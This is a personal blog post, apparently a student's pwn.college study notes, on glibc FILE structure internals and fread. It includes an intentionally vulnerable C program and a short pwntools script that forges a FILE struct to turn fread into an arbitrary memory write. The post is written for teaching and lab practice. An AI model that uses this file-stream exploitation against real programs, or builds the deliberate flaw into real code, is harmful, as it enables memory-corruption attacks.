<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>H1m</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.0.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/links/"><span class="navItemTitle">links</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1></h1></div><hr><div id="post-content"><p>—title: I&#x2F;O Learning—</p>
<h1 id="I-O-Learning-–the-func-fread"><a href="#I-O-Learning-–the-func-fread" class="headerlink" title="I&#x2F;O Learning –the func fread"></a><font style="color:rgb(31, 9, 9);">I&#x2F;O Learning –the func fread</font></h1><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">One and a half months since I started, I have learned from the stack to heap and now I am just starting to I&#x2F;O. I was supposed to study a few days ago, but it was delayed due to my own project and yesterday, I just have been playing a big international matches. in fact, I am looking for some better methods so that I can quickly get started. After asking many friends, I found out pwn.college. it’s the best choice. I need to finish it for one week. i know it is hard for me. However, i will try my best.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">I’ve watched these videos and am now going to make a brief summary. This will also serve as the opening part of the article. Let’s get started.</font></p>
<h2 id="PART1"><a href="#PART1" class="headerlink" title="PART1"></a><font style="color:rgb(31, 9, 9);">PART1</font></h2><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">At the beginning of the first video, the author compared the reading methods of two functions, and it is obvious that we know that the fread function and the fwrite function will be faster.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245002427-728678b5-1618-4b49-9344-3aceb915b4bf.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245002427-728678b5-1618-4b49-9344-3aceb915b4bf.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">As we should make it quickly for us to use the libc has some useful func such as fopen, fread, fwrite which will be the key research topics.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245010677-676de306-d29f-4212-9bd2-525f6eab3b70.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245010677-676de306-d29f-4212-9bd2-525f6eab3b70.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Then we pay our attation to the FILE struct, these buffer pointers. The picture below will show some important Pointers.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245016954-55dc08f0-d208-4226-a44a-7dcf0a9e00d2.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245016954-55dc08f0-d208-4226-a44a-7dcf0a9e00d2.png"></p>
<p><font style="color:rgb(31, 9, 9);">	We some time need to change the flags for only-read or only-write.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">At the beginning, we can see the read ptr has the same addr with buf base and read base. Same time read end go with buf end.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245033088-4781c242-2f8f-421a-96a0-7cb432021907.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245033088-4781c242-2f8f-421a-96a0-7cb432021907.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Also i will show the mid of the process </font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245167397-319755ed-70a8-486a-a494-a7ad042a501a.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245167397-319755ed-70a8-486a-a494-a7ad042a501a.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After reading all, it will flash the buf and let new bytes to the mem.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Here should konw one one thing. If the file is small we may can not read too much.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245155070-069d7787-1529-4021-a757-c71368a3a478.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245155070-069d7787-1529-4021-a757-c71368a3a478.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The fwrite is similar, so i would not pay more time to analysis. Just give one more picture.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245199785-71a28d29-aecf-417c-b760-0fd36ba4b5ea.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245199785-71a28d29-aecf-417c-b760-0fd36ba4b5ea.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">And now, we step into the next ved. </font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">We can totally control the stream by changing its FILE struct.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245244907-df22f657-38ec-4349-82a5-ddd38eabf125.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245244907-df22f657-38ec-4349-82a5-ddd38eabf125.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Just like this.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245266782-043e4f72-3a8f-4aac-839a-672a05d97f5f.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245266782-043e4f72-3a8f-4aac-839a-672a05d97f5f.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Rob make a simple exp, so i will use it</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include &lt;stdio.h&gt;<br>#include &lt;unistd.h&gt;<br><br>// Global win variable<br>int win_var = 0;<br><br>void win() &#123;<br>    puts(&quot;You Win!&quot;);<br>&#125;<br><br>int main(int argc, char **argv) &#123;<br>    // leak win_var<br>    printf(&quot;win_var is located at: %p\n&quot;, &amp;win_var);<br><br>    // Open a file<br>    FILE *file_pointer = fopen(&quot;./flag&quot;, &quot;r&quot;);<br><br>    // Overwrite the file struct from stdin<br>    read(0, file_pointer, 0x100);<br><br>    // Call freed on the file<br>    char buf[256];<br>    puts(&quot;Calling freed!&quot;);<br>    fread(buf, 1, 10, file_pointer);<br><br>    if (win_var) &#123;<br>        win();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Next i will try it by myself. </font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plain">context.arch = &#x27;amd64&#x27;<br>p = process(&#x27;./a.out&#x27;)<br>p.recvuntil(b&#x27;at: &#x27;)<br>win_var_leak = int(p.recvline()[:-1],16) <br>print(hex(win_var_leak))<br><br>fp = FileStructure()<br><br>p.interactive()```<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">To think of something, first we shoule pay attaention to what is FileStructure</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Let’s see more.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs plain">Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.<br>&gt;&gt;&gt; from pwn import*<br>&gt;&gt;&gt; fp = FileStructure()<br>&gt;&gt;&gt; fp<br>&#123; flags: 0x0<br> _IO_read_ptr: 0x0<br> _IO_read_end: 0x0<br> _IO_read_base: 0x0<br> _IO_write_base: 0x0<br> _IO_write_ptr: 0x0<br> _IO_write_end: 0x0<br> _IO_buf_base: 0x0<br> _IO_buf_end: 0x0<br> _IO_save_base: 0x0<br> _IO_backup_base: 0x0<br> _IO_save_end: 0x0<br> markers: 0x0<br> chain: 0x0<br> fileno: 0x0<br> _flags2: 0x0<br> _old_offset: 0xffffffff<br> _cur_column: 0x0<br> _vtable_offset: 0x0<br> _shortbuf: 0x0<br> unknown1: 0x0<br> _lock: 0x0<br> _offset: 0xffffffffffffffff<br> _codecvt: 0x0<br> _wide_data: 0x0<br> unknown2: 0x0<br> vtable: 0x0&#125;<br></code></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs plaintext"><br>&lt;font style=&quot;color:rgb(31, 9, 9);&quot;&gt;	&lt;/font&gt;&lt;font style=&quot;color:rgb(31, 9, 9);&quot;&gt;Here is what filestructure look like.&lt;/font&gt;<br><br>```plain<br>context.arch = &#x27;amd64&#x27;<br>p = process(&#x27;./a.out&#x27;)<br>p.recvuntil(b&#x27;at: &#x27;)<br>win_var_leak = int(p.recvline()[:-1],16) <br>print(hex(win_var_leak))<br><br>fp = FileStructure()<br>payload = fp.read(win_var_leak, 20)<br>p.send(payload)<br>p.interactive()```<br></code></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245278878-ffb874a4-e9f7-4d01-b934-a3347d50e76e.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245278878-ffb874a4-e9f7-4d01-b934-a3347d50e76e.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">We can finally finish our first exp! And why should this do such func. We should pay more to find out.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Take somtime to see this </font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs plain">0x63cc3dfd4014<br>&#123; flags: 0x0<br> _IO_read_ptr: 0x0<br> _IO_read_end: 0x0<br> _IO_read_base: 0x0<br> _IO_write_base: 0x0<br> _IO_write_ptr: 0x0<br> _IO_write_end: 0x0<br> _IO_buf_base: 0x63cc3dfd4014<br> _IO_buf_end: 0x63cc3dfd4028<br> _IO_save_base: 0x0<br> _IO_backup_base: 0x0<br> _IO_save_end: 0x0<br> markers: 0x0<br> chain: 0x0<br> fileno: 0x0<br> _flags2: 0x0<br> _old_offset: 0xffffffffffffffff<br> _cur_column: 0x0<br> _vtable_offset: 0x0<br> _shortbuf: 0x0<br> unknown1: 0x0<br> _lock: 0x0<br> _offset: 0xffffffffffffffff<br> _codecvt: 0x0<br> _wide_data: 0x0<br> unknown2: 0x0<br> vtable: 0x0&#125;```<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">when we use fp.read(). it will definitly change the values. </font><em><strong><font style="color:rgb(31, 9, 9);">And it will fit all the requuirements!</font></strong></em></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Now i will have a quick understanding of this function, so i use CHATGPT, but when you read deeper i will show more details and use the source code to analysis, AI may not as right so just make a simple glance:)</font></p>
<h2 id="PART2"><a href="#PART2" class="headerlink" title="PART2"></a><font style="color:rgb(31, 9, 9);">PART2</font></h2><h3 id="WHAT-AI-SAID"><a href="#WHAT-AI-SAID" class="headerlink" title="WHAT AI SAID"></a><em><strong><font style="color:rgb(31, 9, 9);">WHAT AI SAID</font></strong></em></h3><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fread&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> function is a high-level, buffered input operation. Its primary goal is to minimize expensive system calls by reading large chunks of data from the operating system into an internal buffer, and then serving user requests from that buffer.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Here is the typical execution flow:</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">1.Validate the FILE Stream</font></p>
<p><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;if (!_IO_valid_file(file_pointer)) return EOF;&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Before any operation, </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fread&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> must check if the provided </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;FILE*&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> (file pointer) is valid and usable.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">2.Check the Internal Buffer (User-Space Buffer)</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plain">if (file_pointer-&gt;_IO_read_ptr &lt; file_pointer-&gt;_IO_read_end) &#123;<br>    size_t avail = file_pointer-&gt;_IO_read_end - file_pointer-&gt;_IO_read_ptr;<br>    size_t to_copy = min(requested_size, avail);<br>    memcpy(user_buf, file_pointer-&gt;_IO_read_ptr, to_copy);<br>    file_pointer-&gt;_IO_read_ptr += to_copy;<br>    return to_copy;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Explanation: This is the core of buffered I&#x2F;O. The FILE structure contains pointers to manage its internal buffer: _IO_read_ptr: Current position in the buffer for reading. _IO_read_end: End of the valid data in the buffer.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The Check: If _IO_read_ptr &lt; _IO_read_end, it means there is still data left in the buffer from a previous read operation.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">3.If the Buffer is Empty, Call the Underlying Read Function</font></p>
<p><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;bytes_read = _IO_file_xsgetn(file_pointer, user_buf, requested_size);&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Explanation: If the internal buffer is empty (_IO_read_ptr &gt;&#x3D; _IO_read_end), control is passed to a lower-level function, typically _IO_file_xsgetn. </font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">So If we meet the requirements mentioned above, we can bypass the detection.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Back to the normal process, we will see</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245291947-58d88ec0-2dd2-489e-9ab9-1cea13ddc1d1.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245291947-58d88ec0-2dd2-489e-9ab9-1cea13ddc1d1.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">this is i add some code after fread func, and this time i will use no exp to bypassing it.</font></p>
<pre><code>printf(&quot;%s\n&quot;,buf);```
</code></pre>
<h3 id="REALLY-CHECK"><a href="#REALLY-CHECK" class="headerlink" title="REALLY CHECK"></a><em><strong><font style="color:rgb(31, 9, 9);">REALLY CHECK</font></strong></em></h3><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The overall process involves the fread function calling IO_file_xsgetn from the vtable, where IO_file_xsgetn serves as the core function of fread. Its workflow can be roughly summarized as follows:</font><font style="color:rgb(31, 9, 9);">	</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764244762614-708c6f67-ad7b-4e45-8cce-656cc9c9de36.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764244762614-708c6f67-ad7b-4e45-8cce-656cc9c9de36.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">1.Check if the input buffer fp-&gt;_IO_buf_base is empty. If it is, call _IO_doalllocbuf to initialize the input buffer.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">2.After allocating the input buffer or if the input buffer is not empty, check whether the input buffer contains any data.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">3.If data exists in the input buffer, it is directly copied to the user buffer. If there is no data or insufficient data, the _underflow function is called to execute a system call, reading data into the input buffer before copying it to the user buffer.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The function prototype of fread is:</font></p>
<p><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;size_t fread(void *ptr, size_t size, size_t count, FILE *stream);&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Where:</font></p>
<p><font style="color:rgb(31, 9, 9);">		</font><font style="color:rgb(31, 9, 9);">ptr: Pointer to the location where the result is stored.</font></p>
<p><font style="color:rgb(31, 9, 9);">		</font><font style="color:rgb(31, 9, 9);">size: Size of each data type.</font></p>
<p><font style="color:rgb(31, 9, 9);">		</font><font style="color:rgb(31, 9, 9);">count: Number of data elements.</font></p>
<p><font style="color:rgb(31, 9, 9);">		</font><font style="color:rgb(31, 9, 9);">stream: File pointer.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The function returns the number of data elements successfully read.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plain">#include&lt;stdio.h&gt;<br>int main()&#123;<br><br>    FILE* fp = fopen(&quot;flag&quot;,&quot;rb&quot;);<br>    char *ptr = malloc(0x20);<br>    fread(ptr, 1, 20, fp);<br>    return 0;<br>&#125;```<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Before fread we set a point and use r</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs plain">$1 = &#123;<br>  file = &#123;<br>    _flags = -72539000,<br>    _IO_read_ptr = 0x0,<br>    _IO_read_end = 0x0,<br>    _IO_read_base = 0x0,<br>    _IO_write_base = 0x0,<br>    _IO_write_ptr = 0x0,<br>    _IO_write_end = 0x0,<br>    _IO_buf_base = 0x0,<br>    _IO_buf_end = 0x0,<br>    _IO_save_base = 0x0,<br>    _IO_backup_base = 0x0,<br>    _IO_save_end = 0x0,<br>    _markers = 0x0,<br>    _chain = 0x7ffff7e1b6a0 &lt;_IO_2_1_stderr_&gt;,<br>    _fileno = 3,<br>    _flags2 = 0,<br>    _old_offset = 0,<br>    _cur_column = 0,<br>    _vtable_offset = 0 &#x27;\000&#x27;,<br>    _shortbuf = &quot;&quot;,<br>    _lock = 0x555555559380,<br>    _offset = -1,<br>    _codecvt = 0x0,<br>    _wide_data = 0x555555559390,<br>    _freeres_list = 0x0,<br>    _freeres_buf = 0x0,<br>    __pad5 = 0,<br>    _mode = 0,<br>    _unused2 = &#x27;\000&#x27; &lt;repeats 19 times&gt;<br>  &#125;,<br>  vtable = 0x7ffff7e17600 &lt;_IO_file_jumps&gt;<br>&#125;```<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">When I call fread, I will execute this code.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_size_t<br>_IO_fread (void *buf, _IO_size_t size, _IO_size_t count, _IO_FILE *fp)<br>&#123;<br>  _IO_size_t bytes_requested = size * count;<br>  _IO_size_t bytes_read;<br>  CHECK_FILE (fp, 0);<br>  if (bytes_requested == 0)<br>    return 0;<br>  _IO_acquire_lock (fp);<br><br>  bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested);<br>  _IO_release_lock (fp);<br>  return bytes_requested == bytes_read ? count : bytes_read / size;<br>&#125;<br>libc_hidden_def (_IO_fread)<br>&#125;<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Then we goto _IO_sgetn</font></p>
